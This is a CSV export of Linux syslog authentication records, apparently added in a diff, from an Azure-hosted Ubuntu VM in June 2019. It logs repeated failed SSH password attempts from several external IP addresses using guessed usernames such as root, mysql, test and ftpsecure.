+15407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:05:52,UbuntuDevEnv,2019-06-26 06:05:52,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 59170:11: Bye Bye [preauth],19098,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,59170,,
+15408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:05:52,UbuntuDevEnv,2019-06-26 06:05:52,auth,UbuntuDevEnv,info,Disconnected from authenticating user mysql 106.12.27.140 port 59170 [preauth],19098,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,106.12.27.1,59170,,
+15409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:06:50,UbuntuDevEnv,2019-06-26 06:06:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140  user=proxy,19308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,proxy,106.12.27.1,,0,
+15410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:06:52,UbuntuDevEnv,2019-06-26 06:06:51,auth,UbuntuDevEnv,info,Failed password for proxy from 106.12.27.140 port 12143 ssh2,19308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,12143,,
+15411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:06:52,UbuntuDevEnv,2019-06-26 06:06:51,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 12143:11: Bye Bye [preauth],19308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,12143,,
+15412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:06:52,UbuntuDevEnv,2019-06-26 06:06:51,auth,UbuntuDevEnv,info,Disconnected from authenticating user proxy 106.12.27.140 port 12143 [preauth],19308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,proxy,106.12.27.1,12143,,
+15413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:07:53,UbuntuDevEnv,2019-06-26 06:07:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140  user=test,19536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,106.12.27.1,,0,
+15414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:07:55,UbuntuDevEnv,2019-06-26 06:07:55,auth,UbuntuDevEnv,info,Failed password for test from 106.12.27.140 port 20117 ssh2,19536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,20117,,
+15415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:07:56,UbuntuDevEnv,2019-06-26 06:07:55,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 20117:11: Bye Bye [preauth],19536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,20117,,
+15416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:07:56,UbuntuDevEnv,2019-06-26 06:07:55,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 106.12.27.140 port 20117 [preauth],19536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,106.12.27.1,20117,,
+15417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:13,UbuntuDevEnv,2019-06-26 06:08:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46  user=root,19540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,45.55.190.4,,0,
+15418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:14,UbuntuDevEnv,2019-06-26 06:08:14,auth,UbuntuDevEnv,info,Failed password for root from 45.55.190.46 port 56282 ssh2,19540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,56282,,
+15419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:14,UbuntuDevEnv,2019-06-26 06:08:14,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 56282:11: Bye Bye [preauth],19540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,56282,,
+15420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:14,UbuntuDevEnv,2019-06-26 06:08:14,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 45.55.190.46 port 56282 [preauth],19540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,45.55.190.4,56282,,
+15421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:53,UbuntuDevEnv,2019-06-26 06:08:53,auth,UbuntuDevEnv,info,Invalid user ftpsecure from 106.12.27.140 port 28095,19746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpsecure,106.12.27.1,28095,,
+15422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:53,UbuntuDevEnv,2019-06-26 06:08:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:53,UbuntuDevEnv,2019-06-26 06:08:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,19746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:54,UbuntuDevEnv,2019-06-26 06:08:54,auth,UbuntuDevEnv,info,Invalid user jb from 45.59.69.138 port 60116,19761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jb,45.59.69.1,60116,,
+15425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:54,UbuntuDevEnv,2019-06-26 06:08:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:54,UbuntuDevEnv,2019-06-26 06:08:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,19761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:55,UbuntuDevEnv,2019-06-26 06:08:55,auth,UbuntuDevEnv,info,Failed password for invalid user ftpsecure from 106.12.27.140 port 28095 ssh2,19746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpsecure,106.12.27.1,28095,,
+15428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:56,UbuntuDevEnv,2019-06-26 06:08:55,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 28095:11: Bye Bye [preauth],19746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,28095,,
+15429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:56,UbuntuDevEnv,2019-06-26 06:08:55,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpsecure 106.12.27.140 port 28095 [preauth],19746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpsecure,106.12.27.1,28095,,
+15430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:56,UbuntuDevEnv,2019-06-26 06:08:56,auth,UbuntuDevEnv,info,Failed password for invalid user jb from 45.59.69.138 port 60116 ssh2,19761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jb,45.59.69.1,60116,,
+15431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:56,UbuntuDevEnv,2019-06-26 06:08:56,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 60116:11: Bye Bye [preauth],19761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,60116,,
+15432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:08:56,UbuntuDevEnv,2019-06-26 06:08:56,auth,UbuntuDevEnv,info,Disconnected from invalid user jb 45.59.69.138 port 60116 [preauth],19761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jb,45.59.69.1,60116,,
+15433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:11,UbuntuDevEnv,2019-06-26 06:09:10,auth,UbuntuDevEnv,info,Invalid user rakuya from 139.99.98.248 port 43688,19819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rakuya,139.99.98.2,43688,,
+15434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:11,UbuntuDevEnv,2019-06-26 06:09:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:11,UbuntuDevEnv,2019-06-26 06:09:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,19819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:13,UbuntuDevEnv,2019-06-26 06:09:12,auth,UbuntuDevEnv,info,Failed password for invalid user rakuya from 139.99.98.248 port 43688 ssh2,19819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rakuya,139.99.98.2,43688,,
+15437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:13,UbuntuDevEnv,2019-06-26 06:09:12,auth,UbuntuDevEnv,info,Disconnected from invalid user rakuya 139.99.98.248 port 43688 [preauth],19819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rakuya,139.99.98.2,43688,,
+15438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:13,UbuntuDevEnv,2019-06-26 06:09:12,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 43688:11: Bye Bye [preauth],19819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,43688,,
+15439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:52,UbuntuDevEnv,2019-06-26 06:09:52,auth,UbuntuDevEnv,info,Invalid user tigrou from 106.12.27.140 port 36069,19961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,106.12.27.1,36069,,
+15440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:52,UbuntuDevEnv,2019-06-26 06:09:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:52,UbuntuDevEnv,2019-06-26 06:09:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,19961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:54,UbuntuDevEnv,2019-06-26 06:09:54,auth,UbuntuDevEnv,info,Failed password for invalid user tigrou from 106.12.27.140 port 36069 ssh2,19961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,106.12.27.1,36069,,
+15443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:54,UbuntuDevEnv,2019-06-26 06:09:54,auth,UbuntuDevEnv,info,Disconnected from invalid user tigrou 106.12.27.140 port 36069 [preauth],19961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,106.12.27.1,36069,,
+15444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:09:54,UbuntuDevEnv,2019-06-26 06:09:54,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 36069:11: Bye Bye [preauth],19961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,36069,,
+15445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:40,UbuntuDevEnv,2019-06-26 06:10:39,auth,UbuntuDevEnv,info,Invalid user yuanwd from 45.59.69.138 port 52674,20134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,45.59.69.1,52674,,
+15446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:40,UbuntuDevEnv,2019-06-26 06:10:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,20134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:40,UbuntuDevEnv,2019-06-26 06:10:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:41,UbuntuDevEnv,2019-06-26 06:10:41,auth,UbuntuDevEnv,info,Failed password for invalid user yuanwd from 45.59.69.138 port 52674 ssh2,20134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,45.59.69.1,52674,,
+15449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:41,UbuntuDevEnv,2019-06-26 06:10:41,auth,UbuntuDevEnv,info,Disconnected from invalid user yuanwd 45.59.69.138 port 52674 [preauth],20134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,45.59.69.1,52674,,
+15450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:41,UbuntuDevEnv,2019-06-26 06:10:41,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 52674:11: Bye Bye [preauth],20134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,52674,,
+15451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:53,UbuntuDevEnv,2019-06-26 06:10:52,auth,UbuntuDevEnv,info,Invalid user ka from 106.12.27.140 port 44045,20177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ka,106.12.27.1,44045,,
+15452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:53,UbuntuDevEnv,2019-06-26 06:10:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:53,UbuntuDevEnv,2019-06-26 06:10:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,20177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:55,UbuntuDevEnv,2019-06-26 06:10:54,auth,UbuntuDevEnv,info,Failed password for invalid user ka from 106.12.27.140 port 44045 ssh2,20177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ka,106.12.27.1,44045,,
+15455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:55,UbuntuDevEnv,2019-06-26 06:10:55,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 44045:11: Bye Bye [preauth],20177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,44045,,
+15456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:10:55,UbuntuDevEnv,2019-06-26 06:10:55,auth,UbuntuDevEnv,info,Disconnected from invalid user ka 106.12.27.140 port 44045 [preauth],20177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ka,106.12.27.1,44045,,
+15457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:11:24,UbuntuDevEnv,2019-06-26 06:11:23,auth,UbuntuDevEnv,info,Invalid user gauthier from 139.99.98.248 port 37158,20294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gauthier,139.99.98.2,37158,,
+15458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:11:24,UbuntuDevEnv,2019-06-26 06:11:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:11:24,UbuntuDevEnv,2019-06-26 06:11:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,20294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:11:26,UbuntuDevEnv,2019-06-26 06:11:26,auth,UbuntuDevEnv,info,Failed password for invalid user gauthier from 139.99.98.248 port 37158 ssh2,20294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gauthier,139.99.98.2,37158,,
+15461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:11:26,UbuntuDevEnv,2019-06-26 06:11:26,auth,UbuntuDevEnv,info,Disconnected from invalid user gauthier 139.99.98.248 port 37158 [preauth],20294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gauthier,139.99.98.2,37158,,
+15462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:11:26,UbuntuDevEnv,2019-06-26 06:11:26,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 37158:11: Bye Bye [preauth],20294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,37158,,
+15463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:00,UbuntuDevEnv,2019-06-26 06:12:00,auth,UbuntuDevEnv,info,Invalid user galaxy from 106.12.27.140 port 52023,20415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,galaxy,106.12.27.1,52023,,
+15464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:00,UbuntuDevEnv,2019-06-26 06:12:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:00,UbuntuDevEnv,2019-06-26 06:12:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,20415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
